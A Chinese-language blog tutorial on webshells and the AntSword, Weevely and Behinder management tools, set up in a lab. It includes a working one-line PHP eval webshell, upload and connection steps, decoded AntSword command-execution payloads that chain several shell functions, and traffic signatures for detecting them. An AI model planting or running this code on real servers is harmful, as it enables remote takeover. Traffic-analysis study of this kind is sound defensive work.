主頁 >  其他 > Webshell管理工具

Webshell管理工具

2022-01-17 18:47:32 其他

Webshell簡介

  • Webshell是以ASP、PHP、 JSP或者CGI等網頁檔案形式存在的一種代碼執行環境,主要用于網站管理、服務器管理、權限管理等操作,
  • Webshell使用方法簡單,只需上傳-一個代碼檔案,通過網址訪問,便可進行很多日常操作,極大地方便了使用者對網站和服務器的管理,
  • 正因如此,也有小部分人將代碼修改后當作后門程式使用,以達到控制網站服務器的目的,

Webshell的作用

  • 一方面,Webshell常常被站長用于網站管理、服務器管理等,可以在線編輯網頁腳本、上傳下載檔案、查看資料庫、執行任意程式命令等,
  • 另一方面,Webshell也常 常被入侵者利用,達到控制網站服務器的目的,這些網頁腳本常稱為Web腳本木馬,比較流行主要是ASP或PHP木馬,也有基于.NET的腳本木馬與JSP腳本木馬,國內常用的Webshell有海陽ASP木馬、Phpspy、c99shell等,

Webshell管理工具

  • Webshell管理工具,即用來管理Webshell的工具,其功能類似于木馬的控制端程式,它集成了許多實用的小工具,方便攻擊者對Webshell進行管理,
  • 常見的Webshell管理工具有蟻劍(AntSword)、冰蝎(Behinder) 、Weevely等,

中國蟻劍

中國蟻劍是一款開源的跨平臺網站管理工具,它主要面向于合法授權的滲透測驗安全人員以及進行常規操作的網站管理員,是一款非常優秀的webshell管理工具,

中國蟻劍的核心功能

  • Shell代理功能
  • Shell管理
  • 檔案管理
  • 虛擬終端
  • 資料庫管理
  • 插件市場
  • 插件開發

中國蟻劍的簡單使用

環境需求

  • windows攻擊機,裝有蟻劍
  • windows靶機,有phpstudy環境

步驟1:寫一個簡單的一句話木馬

<?php @eval($_POST['123456']); ?>

關于一句話木馬可以看我之前的博客:使用PHP制作簡單的一句話木馬與PHP中文亂碼問題_.SYS.的博客-CSDN博客_php寫一句話木馬

步驟2:將一句話木馬上傳至靶機的服務器根目錄

步驟3:打開中國蟻劍,右鍵添加資料

步驟4:配置好資料資訊,測驗連接

步驟5:雙擊添加的資料,可以查看靶機的所有的盤符資訊,

右鍵可以打開虛擬終端

中國蟻劍的流量解密及分析

使用Wireshark抓取蟻劍資料包

追蹤HTTP流開始流量分析

不加密

POST /shell.php HTTP/1.1

Host: 192.168.4.229

Accept-Encoding: gzip, deflate

User-Agent: antSword/v2.1

Content-Type: application/x-www-form-urlencoded

Content-Length: 988

Connection: close

123=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22546a1e%22%3Becho%20%40asenc(%24output)%3Becho%20%226786a4e%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3BHTTP/1.1 200 OK

Date: Fri, 14 Jan 2022 07:18:25 GMT

Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02

X-Powered-By: PHP/7.3.4

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html; charset=UTF-8

546a1eD:/phpstudy_pro/WWW C:D: Windows NT DESKTOP-HF3Q4QD 10.0 build 19043 (Windows 10) AMD64 DELL6786a4e

使用URL解碼后

<?php
123=@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){return $out;};
function asoutput(){$output=ob_get_contents();
ob_end_clean();echo "546a1e";
echo @asenc($output);
echo "6786a4e";
}ob_start();
try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}	";
if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";
}else{$R.="/";}$R.="	";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();$R.="	{$s}";
echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};
asoutput();die();

也可以使用Base64加解密方式進行資料加解密

POST /shell.php HTTP/1.1

Host: 192.168.4.229

Accept-Encoding: gzip, deflate

User-Agent: antSword/v2.1

Content-Type: application/x-www-form-urlencoded

Content-Length: 1036

Connection: close

123=%40eval(%40base64_decode(%24_POST%5Bqdf3b71771ac14%5D))%3B&qdf3b71771ac14=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuIEBiYXNlNjRfZW5jb2RlKCRvdXQpO307ZnVuY3Rpb24gYXNvdXRwdXQoKXskb3V0cHV0PW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO2VjaG8gImFkMmI1NmYiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gImY1NzUyYWE3YiI7fW9iX3N0YXJ0KCk7dHJ5eyREPWJhc2U2NF9kZWNvZGUoJF9QT1NUWyJ5ZWRjZDE1NjdlMTA4MSJdKTskRj1Ab3BlbmRpcigkRCk7aWYoJEY9PU5VTEwpe2VjaG8oIkVSUk9SOi8vIFBhdGggTm90IEZvdW5kIE9yIE5vIFBlcm1pc3Npb24hIik7fWVsc2V7JE09TlVMTDskTD1OVUxMO3doaWxlKCROPUByZWFkZGlyKCRGKSl7JFA9JEQuJE47JFQ9QGRhdGUoIlktbS1kIEg6aTpzIixAZmlsZW10aW1lKCRQKSk7QCRFPXN1YnN0cihiYXNlX2NvbnZlcnQoQGZpbGVwZXJtcygkUCksMTAsOCksLTQpOyRSPSIJIi4kVC4iCSIuQGZpbGVzaXplKCRQKS4iCSIuJEUuIgoiO2lmKEBpc19kaXIoJFApKSRNLj0kTi4iLyIuJFI7ZWxzZSAkTC49JE4uJFI7fWVjaG8gJE0uJEw7QGNsb3NlZGlyKCRGKTt9O31jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gIkVSUk9SOi8vIi4kZS0%2BZ2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs%3D&yedcd1567e1081=RDovcGhwc3R1ZHlfcHJvL1dXVy8%3DHTTP/1.1 200 OK

Url解碼后

123=@eval(@base64_decode($_POST[qdf3b71771ac14]));&qdf3b71771ac14=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuIEBiYXNlNjRfZW5jb2RlKCRvdXQpO307ZnVuY3Rpb24gYXNvdXRwdXQoKXskb3V0cHV0PW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO2VjaG8gImFkMmI1NmYiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gImY1NzUyYWE3YiI7fW9iX3N0YXJ0KCk7dHJ5eyREPWJhc2U2NF9kZWNvZGUoJF9QT1NUWyJ5ZWRjZDE1NjdlMTA4MSJdKTskRj1Ab3BlbmRpcigkRCk7aWYoJEY9PU5VTEwpe2VjaG8oIkVSUk9SOi8vIFBhdGggTm90IEZvdW5kIE9yIE5vIFBlcm1pc3Npb24hIik7fWVsc2V7JE09TlVMTDskTD1OVUxMO3doaWxlKCROPUByZWFkZGlyKCRGKSl7JFA9JEQuJE47JFQ9QGRhdGUoIlktbS1kIEg6aTpzIixAZmlsZW10aW1lKCRQKSk7QCRFPXN1YnN0cihiYXNlX2NvbnZlcnQoQGZpbGVwZXJtcygkUCksMTAsOCksLTQpOyRSPSIJIi4kVC4iCSIuQGZpbGVzaXplKCRQKS4iCSIuJEUuIgoiO2lmKEBpc19kaXIoJFApKSRNLj0kTi4iLyIuJFI7ZWxzZSAkTC49JE4uJFI7fWVjaG8gJE0uJEw7QGNsb3NlZGlyKCRGKTt9O31jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gIkVSUk9SOi8vIi4kZS0+Z2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs=&yedcd1567e1081=RDovcGhwc3R1ZHlfcHJvL1dXVy8=

Base64流量解密

Base64解碼
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out)
{return @base64_encode($out);};
function asoutput()
{$output=ob_get_contents();
ob_end_clean();
echo "ad2b56f";
echo @asenc($output);
echo "f5752aa7b";
}ob_start();
try{$D=base64_decode($_POST["yedcd1567e1081"]);    //base64的路徑
$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");   打開路徑,不存在就報錯報錯

執行ipconfig流量特征

在虛擬終端中執行ipconfig命令

POST /1.php HTTP/1.1
Host: 192.168.147.132
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 4029
Connection: close

123456=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%222128a7e59%22%3Becho%20%40asenc(%24output)%3Becho%20%2294639%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(%24_POST%5B%22ff7659052dae3%22%5D)%3B%24s%3Dbase64_decode(%24_POST%5B%22if34e82746af23%22%5D)%3B%24envstr%3D%40base64_decode(%24_POST%5B%22rd6ea77c0d0469%22%5D)%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3Bif(substr(%24d%2C0%2C1)%3D%3D%22%2F%22)%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%22)%3B%7Delse%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3BC%3A%2FWindows%2Fsystem32%3BC%3A%2FWindows%2FSysWOW64%3BC%3A%2FWindows%3BC%3A%2FWindows%2FSystem32%2FWindowsPowerShell%2Fv1.0%2F%3B%22)%3B%7Dif(!empty(%24envstr))%7B%24envarr%3Dexplode(%22%7C%7C%7Casline%7C%7C%7C%22%2C%20%24envstr)%3Bforeach(%24envarr%20as%20%24v)%20%7Bif%20(!empty(%24v))%20%7B%40putenv(str_replace(%22%7C%7C%7Caskey%7C%7C%7C%22%2C%20%22%3D%22%2C%20%24v))%3B%7D%7D%7D%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%3B%7Delse%7B%24d%3Darray_map('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runshellshock(%24d%2C%20%24c)%20%7Bif%20(substr(%24d%2C%200%2C%201)%20%3D%3D%20%22%2F%22%20%26%26%20fe('putenv')%20%26%26%20(fe('error_log')%20%7C%7C%20fe('mail')))%20%7Bif%20(strstr(readlink(%22%2Fbin%2Fsh%22)%2C%20%22bash%22)%20!%3D%20FALSE)%20%7B%24tmp%20%3D%20tempnam(sys_get_temp_dir()%2C%20'as')%3Bputenv(%22PHP_LOL%3D()%20%7B%20x%3B%20%7D%3B%20%24c%20%3E%24tmp%202%3E%261%22)%3Bif%20(fe('error_log'))%20%7Berror_log(%22a%22%2C%201)%3B%7D%20else%20%7Bmail(%22a%40127.0.0.1%22%2C%20%22%22%2C%20%22%22%2C%20%22-bv%22)%3B%7D%7D%20else%20%7Breturn%20False%3B%7D%24output%20%3D%20%40file_get_contents(%24tmp)%3B%40unlink(%24tmp)%3Bif%20(%24output%20!%3D%20%22%22)%20%7Bprint(%24output)%3Breturn%20True%3B%7D%7Dreturn%20False%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C2048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('proc_open'))%7B%24p%20%3D%20%40proc_open(%24c%2C%20array(1%20%3D%3E%20array('pipe'%2C%20'w')%2C%202%20%3D%3E%20array('pipe'%2C%20'w'))%2C%20%24io)%3Bwhile(!%40feof(%24io%5B1%5D))%7Bprint(%40fgets(%24io%5B1%5D%2C2048))%3B%7Dwhile(!%40feof(%24io%5B2%5D))%7Bprint(%40fgets(%24io%5B2%5D%2C2048))%3B%7D%40fclose(%24io%5B1%5D)%3B%40fclose(%24io%5B2%5D)%3B%40proc_close(%24p)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delseif(runshellshock(%24d%2C%20%24c))%20%7Breturn%20%24ret%3B%7Delseif(substr(%24d%2C0%2C1)!%3D%22%2F%22%20%26%26%20%40class_exists(%22COM%22))%7B%24w%3Dnew%20COM('WScript.shell')%3B%24e%3D%24w-%3Eexec(%24c)%3B%24so%3D%24e-%3EStdOut()%3B%24ret.%3D%24so-%3EReadAll()%3B%24se%3D%24e-%3EStdErr()%3B%24ret.%3D%24se-%3EReadAll()%3Bprint(%24ret)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&ff7659052dae3=Y21k&if34e82746af23=Y2QgL2QgIkM6XFxwaHBzdHVkeV9wcm9cXFdXVyImaXBjb25maWcmZWNobyBbU10mY2QmZWNobyBbRV0%3D&rd6ea77c0d0469=HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 16:14:57 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

第一個特征:

User-Agent: antSword/v2.1

第二個特征:

@ini_set("display_errors", "0"); 其它會加密,蟻劍是明文的,

第三個特征

出現緩沖區的函式

第四個特征

Base64最后的一個欄位解密是當前目錄

Weevely簡介

  • Weevely是-款Python撰寫的Webshell管理工具,它最大的優點在于跨平臺,可以算作是Linux下的一款菜刀替代工具(限于PHP)
  • Kali Linux自帶Weevely.

Weevely的基本命令 ——生成專用木馬

weevely generate <password> <path>

Weevely的基本命令 ——遠程連接木馬或執行命令

weevely <url> <password> [cmd]

Weevely模塊呼叫

連接木馬成功后會得到shell,除了執行基礎的系統命令,還可以輸入help,呼叫weevely模塊

file_ls:查看檔案及目錄

file_download:將遠程目錄下的檔案下載到本地

Weevely 流量分析

以 system_info 為例

冰蝎哥斯拉的用法都類似,直接看流量分析

冰蝎3.0流量分析

冰蝎自定義默認密碼流量包

POST /shell.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Content-type: application/x-www-form-urlencoded
Referer: http://192.168.4.229/shell.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.4.229
Connection: keep-alive
Content-Length: 6252

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HTTP/1.1 200 OK
Date: Sat, 15 Jan 2022 02:22:29 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=kv8hmj5ack6dv9uiobhoaff176; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

